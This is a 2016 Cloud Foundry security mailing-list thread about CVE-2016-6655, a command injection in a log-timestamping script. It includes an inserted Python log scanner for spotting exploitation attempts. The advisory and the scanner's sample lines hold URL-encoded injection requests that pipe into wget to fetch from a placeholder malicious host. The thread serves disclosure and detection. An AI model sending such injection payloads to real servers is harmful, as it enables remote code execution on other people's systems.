[security] CVE 2016-6655: Utility script command injection
Molly Crowther
Hello all - many people were asking for more information, so we have prepared the following statement regarding CVE-2016-6655:

Thanks,
Molly Crowther
CFF Security Team

------

This issue was discovered by the IBM BlueMix team and was responsibly reported to the Cloud Foundry Foundation.

A common script shared by many Cloud Foundry components includes some code responsible for prepending timestamps to component logs. This code is vulnerable to command injection in any component that logs user-provided data. Critically, it is possible for an attacker to craft a request to gorouter that can execute arbitrary code as the VCAP user on the gorouter VM.

Gorouter logs should be examined for examples of shell-escape sequences if operators suspect that their system may have been compromised. An example would be to url-encode a pipe (“|”) character followed by a malicious command, as in: https://gorouter.your-cf.com/%7Cwget%20http://something.malicious

Note that this is only one of a number of ways in which an attacker could invoke an arbitrary command via this vulnerability.

Fixes were made to every CF component where this utility script is run. Some components include this script but do not run it. Future updates will remove the final unused instances of the vulnerable code to prevent unintentional reintroduction.

Operators are strongly encouraged to upgrade to CF 245 or later and use the most recent version of any standalone CF components.

For the original public notice regarding CVE-2016-6655, please see: https://lists.cloudfoundry.org/archives/list/cf-dev(a)lists.cloudfoundry.org/message/42YUJU2N27HBPFVMZR2QM7JI6YSEKORR/

On Mon, Oct 17, 2016 at 8:34 AM, Travis McPeak <tmcpeak(a)cloudfoundry.org> wrote:
> CVE 2016-6655: Utility script command injection
> Severity
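The statement above recommends examining gorouter logs for shell-escape sequences. The following is an added example (not part of the thread, and not Cloud Foundry code) of how an operator might automate that check: it URL-decodes the request path of each access-log line and flags any path that, once decoded, contains shell metacharacters such as the pipe the advisory mentions. The log line format, the field regex and the sample lines are constructed for the example and are assumptions; real gorouter access logs may need a different `REQUEST_RE`.

```python
import re
from urllib.parse import unquote

# Shell metacharacters that, after URL decoding, could break out of an
# unquoted expansion inside a shell script that prefixes log lines.
SHELL_META = re.compile(r"[|;&`$(){}<>\n]")

# Captures the request path from a constructed access-log line.
# Assumed format: ... "METHOD /path HTTP/x.y" ... ; adjust to your logs.
REQUEST_RE = re.compile(
    r'"(?:GET|POST|PUT|DELETE|HEAD|OPTIONS|PATCH) (\S+) HTTP/[\d.]+"'
)


def suspicious_paths(lines):
    """Return (line_no, decoded_path, metachars) for every request whose
    URL-decoded path contains shell metacharacters.

    Decoding first matters: the advisory's example hides the pipe as %7C,
    so a plain substring search for "|" in the raw line would miss it.
    """
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        decoded = unquote(m.group(1))
        meta = sorted(set(SHELL_META.findall(decoded)))
        if meta:
            hits.append((n, decoded, meta))
    return hits


# Constructed sample lines (not real gorouter output). The third line encodes
# a pipe followed by a command, mirroring the pattern described in the advisory;
# the fourth hides a semicolon in a query parameter.
SAMPLE_LOG = [
    'app.example.com - [2016-10-17T14:00:01.000+0000] "GET /index.html HTTP/1.1" 200 512',
    'app.example.com - [2016-10-17T14:00:02.000+0000] "GET /api/items?id=42 HTTP/1.1" 200 88',
    'app.example.com - [2016-10-17T14:00:03.000+0000] "GET /%7Cwget%20http://attacker.invalid/x HTTP/1.1" 404 0',
    'app.example.com - [2016-10-17T14:00:04.000+0000] "GET /search?q=a%3Bid HTTP/1.1" 200 10',
]

if __name__ == "__main__":
    for n, path, meta in suspicious_paths(SAMPLE_LOG):
        print(f"line {n}: shell metacharacters {meta} in decoded path {path!r}")
```

Run against a real log file by replacing `SAMPLE_LOG` with the file's lines. Any hit warrants a closer look at the full request and the timestamp prefixing code on that component rather than being treated as proof of compromise, since legitimate clients occasionally send these characters too.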
Hector Rivas Gandara
Hello,
Thank you for reporting this. I observed that the CVE in mitre.org did not get updated: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6655

How long does it take to get it updated?

On 17 October 2016 at 20:34, Molly Crowther <mcrowther(a)cloudfoundry.org> wrote:
> Hello all - many people were asking for more information, so we have

--
Regards
Hector Rivas | GDS / Multi-Cloud PaaS
Molly Crowther
Hello Hector,
The answer is that it varies. I can tell you that we have followed the steps we need to do to get it into the database, it just takes time depending on how fast MITRE makes the updates. It is not an automatic process.

Let me know if you have any other questions.

Thanks,
Molly Crowther
CFF Security Team

On Fri, Oct 21, 2016 at 2:46 AM, Hector Rivas Gandara <hector.rivas.gandara(a)digital.cabinet-office.gov.uk> wrote:
> Hello,